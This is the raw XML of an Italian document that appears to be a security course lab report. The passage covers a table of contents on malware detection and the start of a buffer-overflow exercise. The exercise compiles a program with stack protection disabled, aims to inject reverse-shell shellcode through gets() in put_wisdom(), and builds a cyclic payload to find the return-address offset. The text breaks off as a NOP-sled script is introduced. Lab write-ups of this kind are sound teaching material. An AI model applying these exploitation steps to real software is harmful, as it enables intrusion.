              <w:t>86</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="226415B8" w14:textId="695221AF" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165832" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8. Malware Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165832 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74A1F33B" w14:textId="486548BB"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33" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1 Yara</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165833 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03FD11E7" w14:textId="1B45DEDA"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34" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2 Yara extra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165834 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EA47AF3" w14:textId="136C8D6C"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35" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3 Sysmon e Sigma Rules</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165835 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="270D8050" w14:textId="3B91F729" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165836" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4 Snort Optional Task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165836 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B89A155" w14:textId="4C005434" w:rsidR="00584820" w:rsidRDefault="00321262">
          <w:r w:rsidRPr="008C299B">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="64BAF0E8" w14:textId="4ACE58E5" w:rsidR="00A459C6" w:rsidRDefault="00492E37" w:rsidP="00A459C6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7810E2A6" w14:textId="37FB1DF2" w:rsidR="001440FC" w:rsidRDefault="00BB78EF" w:rsidP="005A0EF9">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="600"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc140165774"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Buffer Overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="79E6D85D" w14:textId="49133BAA" w:rsidR="00A459C6" w:rsidRDefault="00A459C6" w:rsidP="00FE0097">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Il buffer overflow è un tipo di attacco informatico che sfrutta un errore di programmazione in cui un programma non controlla adeguatamente la quantità di dati che vengono inseriti in un buffer. In questo modo, un attaccante può sovrascrivere altre aree di memoria del sistema, modificando il comportamento del programma o persino assumendo il controllo del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD52511" w14:textId="5C2105C2" w:rsidR="00E14144" w:rsidRDefault="00A459C6" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le aree di memoria in cui è possibile effettuare un attacco di buffer overflow dipendono dal tipo di architettura del sistema e dalla configurazione del programma attaccato. In genere, l'attacco viene effettuato sulla stack, che è un'area di memoria utilizzata dal programma per gestire le chiamate di funzione e le variabili locali. Tuttavia, può anche essere possibile attaccare l'heap, che è un'area di memoria utilizzata per gestire l'allocazione dinamica della memoria, o altre aree di memoria del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3914F" w14:textId="3E8E7953" w:rsidR="00251438" w:rsidRDefault="005C6C97" w:rsidP="00FE0097">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc140165775"/>
      <w:r>
        <w:t>1.1 Fase preliminare</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="438A0BCB" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nella fase preliminare andiamo a compilare il programma nella versione 64bit e 32 bit andando però a disabilitare una serie di misure di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F34ABB" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="005C6C97">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D86B590" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRPr="00F36C00" w:rsidRDefault="005C6C97" w:rsidP="005C6C97">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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36C00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. gcc -fno-stack-protector -z execstack -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F00FB0" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRPr="00F36C00" w:rsidRDefault="005C6C97" w:rsidP="005C6C97">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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36C00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. wisdom-alt.c -o wisdom-alt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B967329" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="005C6C97">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CCA36B" w14:textId="22EE74E1" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="004B27BA">
        <w:t>particolare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A60A33" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-fno-stack-protector: disattiva la funzione di protezione dello stack nel compilatore, che è progettata per proteggere i programmi contro gli overflow del buffer e altri tipi di attacchi basati sullo stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2278F" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-z execstack: rende eseguibile codice nell’area stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11147B68" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-g: questo flag include le informazioni di debugging nel file eseguibile compilato, che può essere utile per il debugging dei programmi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CCD918" w14:textId="77777777" w:rsidR="005C6C97" w:rsidRDefault="005C6C97" w:rsidP="00A459C6"/>
    <w:p w14:paraId="425561E1" w14:textId="6D825F82" w:rsidR="00251438" w:rsidRPr="00545604" w:rsidRDefault="00FE22D3" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc140165776"/>
      <w:r w:rsidRPr="00545604">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="005C6C97">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00545604">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000566D8" w:rsidRPr="00545604">
        <w:t xml:space="preserve">Challenge </w:t>
      </w:r>
      <w:r w:rsidRPr="00545604">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00545604" w:rsidRPr="00545604">
        <w:t>put_wisdom”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="07819754" w14:textId="77777777" w:rsidR="005E09F4" w:rsidRDefault="00FE22D3" w:rsidP="00D55433">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attaccare il buffer overflow nella funzione </w:t>
      </w:r>
      <w:r w:rsidR="005E09F4" w:rsidRPr="005E09F4">
        <w:rPr>
          <w:rStyle w:val="Enfasicorsivo"/>
        </w:rPr>
        <w:t>"put_wisdom()"</w:t>
      </w:r>
      <w:r w:rsidR="005E09F4">
        <w:t xml:space="preserve"> (versione </w:t>
      </w:r>
      <w:r w:rsidR="005E09F4" w:rsidRPr="007B277E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>64 bit</w:t>
      </w:r>
      <w:r w:rsidR="005E09F4">
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B9C4F" w14:textId="28EEB878" w:rsidR="007B277E" w:rsidRDefault="005E09F4" w:rsidP="00D55433">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>iniettare uno shellcode (es. reverse shell)</w:t>
      </w:r>
      <w:r w:rsidR="00D55433">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6843D" w14:textId="3DF7898F" w:rsidR="00D55433" w:rsidRDefault="00D55433" w:rsidP="00D55433">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFF45D7" w14:textId="77777777" w:rsidR="007619BA" w:rsidRDefault="00F435AF" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La funzione put_wisdom() utilizza </w:t>
      </w:r>
      <w:r w:rsidR="002C5380">
        <w:t>una funzione C gets() che è considerata pericolosa perché non effettua alcun controllo sulla dimensione dell’input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21568345" w14:textId="6F9D1642" w:rsidR="007619BA" w:rsidRDefault="00977162" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Vediamo nell</w:t>
      </w:r>
      <w:r w:rsidR="00EB4120">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>a successiva immagi</w:t>
      </w:r>
      <w:r w:rsidR="008D402A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ne la funzione vulnerabile all’attacco BO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A18EDB" w14:textId="77777777" w:rsidR="00F27936" w:rsidRDefault="00F27936" w:rsidP="008D402A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BE26FC" w14:textId="77EE939B" w:rsidR="00977162" w:rsidRDefault="007619BA" w:rsidP="008D402A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A54C81F" wp14:editId="6626ADCE">
            <wp:extent cx="3556660" cy="2695043"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>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4454" t="47372" r="59203" b="5565"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3558073" cy="2696114"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C617CC6" w14:textId="1581F8CA" w:rsidR="00530BAC" w:rsidRDefault="00022973" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB5253">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo aver studiato la grandezza del codice della reverse shell e lo spazio disponibile nel buffer da attaccare, è stato scoperto che per far eseguire correttamente il codice è necessario aumentare la dimensione del buffer. Ciò è dovuto al fatto che non c'è abbastanza spazio tra il codice iniettato e l'indirizzo di </w:t>
      </w:r>
      <w:r w:rsidR="00220735" w:rsidRPr="00AB5253">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>ritorno</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB5253">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>. Probabilmente, quando la shell inizia l'esecuzione e carica altre informazioni nello stack, il programma termina prematuramente.</w:t>
      </w:r>
      <w:r w:rsidR="0072150C" w:rsidRPr="00AB5253">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Dunque si è deciso di </w:t>
      </w:r>
      <w:r w:rsidR="0072150C" w:rsidRPr="00C26524">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>raddoppiare la dimensione del buffer</w:t>
      </w:r>
      <w:r w:rsidR="0072150C" w:rsidRPr="00AB5253">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A885C31" w14:textId="77777777" w:rsidR="00AB5253" w:rsidRDefault="00AB5253" w:rsidP="00FE0097">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B52D057" w14:textId="34EFB026" w:rsidR="001032A5" w:rsidRDefault="001032A5" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Iniziamo creando un "payload", ovvero un insieme di dati che ci permetterà di sovrascrivere l'indirizzo di ritorno del programma e far eseguire una "reverse shell" (una connessione remota a un terminale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284D152" w14:textId="250FD7DC" w:rsidR="001032A5" w:rsidRDefault="001032A5" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Per capire dove posizionare l'indirizzo di ritorno, creiamo il payload utilizzando una stringa "2\n", seguita da 1024 caratteri "A", e poi da una stringa ciclica di 8 caratteri ripetuti in modo da formare una stringa di 1200 caratteri.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0807F99A" w14:textId="6E9F254F" w:rsidR="003504A4" w:rsidRDefault="001032A5" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Il payload generato viene salvato in un file chiamato </w:t>
      </w:r>
      <w:r w:rsidRPr="001032A5">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="003F33A3">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>payload_cyclic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001032A5">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Successivamente, inseriamo il payload come input al programma e utilizziamo un debugger per verificare quale stringa si è posizionata all'interno dell'indirizzo di ritorno. In questo modo possiamo determinare la distanza dal buffer iniziale e quindi individuare la posizione dove inserire l'indirizzo di ritorno malevolo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD6A16" w14:textId="53E80B57" w:rsidR="0012400E" w:rsidRDefault="003504A4" w:rsidP="001032A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE7DBF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="215E0C8E" wp14:editId="4F5867CB">
            <wp:extent cx="6518383" cy="3022270"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="3" name="Immagin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5362" t="9381" b="12566"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6539828" cy="3032213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="315DB6B2" w14:textId="33D8C71E" w:rsidR="00D55433" w:rsidRDefault="0099457D" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Andiamo quindi a </w:t>
      </w:r>
      <w:r w:rsidR="00A31569">
        <w:t>stabilire come comporre il payload per eseguire la reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5256C" w14:textId="3BE83331" w:rsidR="00A31569" w:rsidRDefault="00DE610F" w:rsidP="00A31569">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="414CF0D2" wp14:editId="0F2FE81C">
            <wp:extent cx="3200400" cy="32181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218180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76088E1E" w14:textId="2AA1B425" w:rsidR="00DE610F" w:rsidRDefault="00621133" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo uno script python </w:t>
      </w:r>
      <w:r w:rsidR="002E242C">
        <w:t xml:space="preserve">per generare questo payload che inserirà una serie di NOP sled </w:t>
      </w:r>
      <w:r w:rsidR="00BF6BFD">
        <w:t xml:space="preserve">(che fungeranno da scivolo fino alla shellcode) </w:t>
      </w:r>
